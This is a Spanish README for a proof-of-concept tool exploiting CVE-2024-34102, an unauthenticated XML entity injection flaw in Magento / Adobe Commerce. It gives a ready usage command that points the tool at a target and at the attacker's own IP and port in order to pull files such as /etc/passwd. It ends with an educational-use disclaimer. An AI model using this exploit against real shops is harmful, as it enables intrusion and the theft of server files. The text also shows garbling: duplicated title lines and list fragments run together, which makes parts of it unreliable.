
PoC para CVE-2024-34102. Un problema de inyección de entidades XML antes de la autenticación en Magento / Adobe Commerce.
POC para CVE-2024-34102. Una vulnerabilidad de inyección de entidad XML sin autenticación en Magento / Adobe Commerce.

Este POC intentará leer archivos de hosts objetivo que son vulnerables a la reciente CVE-2024-34102 de Magento / Adobe Commerce. Este POC se basa en este aviso de seguridad y en esta investigación de Assetnote.
Para ejecutar este POC, necesitará una máquina con una IP publicada y accesible.
poc.xml que contiene los payloads principales./etc/passwd).requestsPara usar este POC contra un único objetivo:
python cve-2024-34102.py -u target -ip ip-de-tu-maquina -p cualquier-puerto-abierto-en-tu-maquina -r archivo-a-leer-del-objetivo (por defecto /etc/passwd)
Para cualquier sugerencia o pensamiento, comuníquese con mí.
Esta herramienta provista es solo para fines educativos. No fomento, consiento ni apoyo el acceso no autorizado a ningún sistema o red. Use esta herramienta de manera responsable y solo en sistemas para los que tenga permiso explícito de prueba. Cualquier acción y consecuencia derivada del mal uso de esta herramienta es su propia responsabilidad.